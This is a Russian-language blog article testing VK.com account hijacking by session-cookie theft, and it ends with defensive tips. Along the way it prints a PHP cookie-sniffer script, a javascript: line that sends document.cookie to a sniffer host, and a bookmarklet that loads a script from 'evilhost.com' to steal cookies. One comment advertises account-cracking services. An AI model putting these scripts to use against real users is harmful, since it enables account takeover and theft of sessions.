Войти | Регистрация
Windows [87]
Установка | Настройка
BIOS [13]
Описание | Настройка
Прочее [79]
Статьи не попавшие ни в одну категорию
Интернет [27]
Настройка | Проблемы | Решения
Безопасность [8]
Статьи о том, как обезопасить себя и близких
Секретные коды [18]
Секретные коды телефонов
Android [38]
Статьи про Android OS
Онлайн сервисы [6]
Аналоги программ доступные онлайн
Лицензии [1]
Ключи, коды для антивирусов
Барахолка [1]
Статьи не относящиеся к IT
» Статьи » Интернет

Легко ли взломать страницу вконтакте?

Достаточно часто на просторах рунета, можно встретить объявления типа: Взломаю любой аккаунт социальной сети, взмылю мыло по шустрому :-)

Взлом страницы Вконтакте

Да и так, как одна из моих профессий тесно связана  с IT безопасностью, сегодня я решил немного эту тему по развивать.  А именно протестировать возможность взлома страницы вконтакте, посредством подмены параметров файлов cookies. Специально для этих целей я зарегистрировал два аккаунта vk.соm, естественно вошел в них на разных компах, и сохранил куки.

В качестве клиентской ОС использовал горячо любимый мною Linux, вторая страница была открыта в Opera (на ОС Windows XP) так, как только этот интернет браузер имеет возможность изменять параметры cookies. В качестве Web сервера использовал LAMP. Весь тест проводился в локальной сети, с выходом в интернет через прокси сервер. На веб сервере, я по быстрому набросал и разместил PHP скрипт (сниффер), который принимал клиентские куки, вот такого содержания:

Код

//читаем кукисы из адресной строки
$cookie = $_SERVER['REQUEST_URI'];

//фиксируем ip (на всякий случай:)
$ip = $_SERVER['REMOTE_ADDR'];

//создаем и открываем на запись файл snif.dat
$file = fopen("snif.dat","a+");

//вычисляем текущее время
$time = date("H:i:M:d");

//добавляем в строковую переменную куки + время + ip
$add_text = "$ip $time $cookie";

//записываем данные в файл
fputs($file,$add_text.",\r\n");

//закрываем файл
fclose($file);

//делаем редирект куда-нибудь:)
header('Location: http://master-it.biz');

?>

 

Сниффер принимающий кукисы готов, а передавал я их с помощью JavaScript, вбив в адресную строку:

Код
javascript:window.location.href = "http://testing/sniff.php?cookie="+document.cookie;

Я не стал полностью автоматизировать работу клиента, т. к. это уже выходит за рамки моих морально=этических представлений, ибо любой остро желающий может разработать его самостоятельно.

Следующей задачей для меня была подмена уведенных куков. И это оказалось вообще проще простого. Открыв браузер Опера => Настройки => Общие настройки => Расширенные => Cookies

Opera Cookies

Я изменил только значение параметра куков remixsid и сразу же вошел в другой аккаунт :-)

Но стоило мне сменить ip адрес, как передо мной во весь экран на рисовалась балалайка (старая такая: добрая, русская) :-)

Тогда я тупо скопировал всю папку
C:\Users\Master-It\AppData\Roaming\Opera\Opera\ авторизовавшись уже в
Windows 7, инициируя действия трояна, и опять сменил ip адрес, потом
заменил содержимое папок Opera, и опять вошел в (чужой) аккаунт!

И какой из всего этого напрашивается вывод?

Да очень простой! Взлом аккаунта очень мало вероятен, если вы переходите по ссылке на какой-то [сомнительный] сторонний ресурс, но зато он будет возможен при переходе на фейковую страницу. И для этого злоумышленник, как правило использует социальную инженерию. Т. е. находит метод при котором вы самостоятельно сливаете ему свои данные от страниц социальных сетей.

С vk.com не прокатывают  Brute Force Attack   с использованием утилит жесткого перебора паролей. Ибо после неудачной 3-5 попытки включается капча.

В качестве альтернативы могут выступать вирусы трояны, которые просто воруют пользовательские данные [пачками] пакетами, и отправляют их своим разработчикам (клиентам).

И уж точно, я бы не стал использовать для этих целей какие-то сторонние утилиты, ибо тема бесплатного сыра кажется мне уже давно избитой, и пользы от него несоизмеримо меньше нежели вреда. Ведь бот нет расширяется с каждым днем в арифметической прогрессии. :-)

Взлом ВКонтакте (vk.com) и социальная инженерия

Сейчас я приведу пример эксплуатации социальной инженерии, для взлома аккаунта vk.com.

Многие знают, что в популярной соц. сети имеется огромная база медиа файлов, около 1000 ТБ, но это собственно и не соль, а вот именно соль заключается в том, что многие хотят скачать музыку из соц. сети  вконтакте , и находят для этих целей соответствующие скрипты.

Самый банальный скрипт, который незаметно для пользователя, уведет его файлы куки, может выглядеть так:

Код
javascript:var sc=document.createElement(‘script’);sc.src=’http://evilhost.com/scripts/evilscript.js?nz=’+Math.random();document.body.appendChild(s);void(0);

Естественно, пользователь сам его вставляет в адресную строку браузера, и активирует. Самое интересное, что после этого он еще и скачивает музыку, в то время, как злоумышленник анализирует его файлы cookies :)

Как защитить компьютер от взлома?

Вопрос конечно больше риторический, но все же  варианты есть:

  1. Не сохранять Cookies и прочие пользовательские данные на жесткий диск.
  2. Использовать хороший антивирус + файрвол.
  3. Прежде чем нажать на ссылку, смотреть куда она ведет.
  4. Во избежании ввода данных на фейковой странице, внимательно смотреть Url в адресной строке браузера.
  5. Никогда не светить свою реальную почту, которая связана с чем бы то ни было.
  6. Не хранить логины и пароли в не зашифрованном виде на локальном компьютере, например в текстовом файле.

P.S. Ну и конечно же периодически создавать контрольные точки восстановления Windows. Ну это так, на всякий случай! :-)



Нравится


Источник: http://master-it.biz
4
Категория: Интернет
Просмотров: 9947
Добавил: VadimW
Добавлено: 2013-09-02(21:08:12)
Последнее изменение: 2023-06-21
Теги: Соц сеть, брут, вконтакте, vk.com, взломать, форсе, страницу, легко
Похожие материалы
Всего комментариев: 6
6 RucasinoCak   (2024-10-12 13:20:59) [Материал]
very good
5 Roberttet   (2024-09-11 16:53:41) [Материал]
Thanks for the post
4 Holographicgqp   (2024-09-05 23:19:26) [Материал]
only a few survived.
3 Minelabrcf   (2024-09-02 01:01:17) [Материал]
or their samples written
2 vornetkin   (2020-07-03 18:43:06) [Материал]
Могу помочь с этим,
если кому требуется,
пишите на почту:
mail_crack@rocketmail.com
1 VadimW   (2013-10-02 17:28:42) [Материал]
В этой статье написано же VK.com не взломать dry
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Администрация сайта не несёт никакой ответственности за предоставленные файлы и статьи. Все Права на файлы принадлежат их авторам. Копирование материала ОБЯЗАТЕЛЬНО должно сопровождаться ссылкой на этот сайт!

© Of Comp - Про Комп | Основан 17 Февраля 2012 - 2024
Сайт создавался при помощи FireFox и FireBug
Создатель и дизайнер: VadimW | Author of the Site
Отказ от ответственности

Top.Mail.Ru Яндекс.Метрика MyCounter - счётчик и статистика
статистика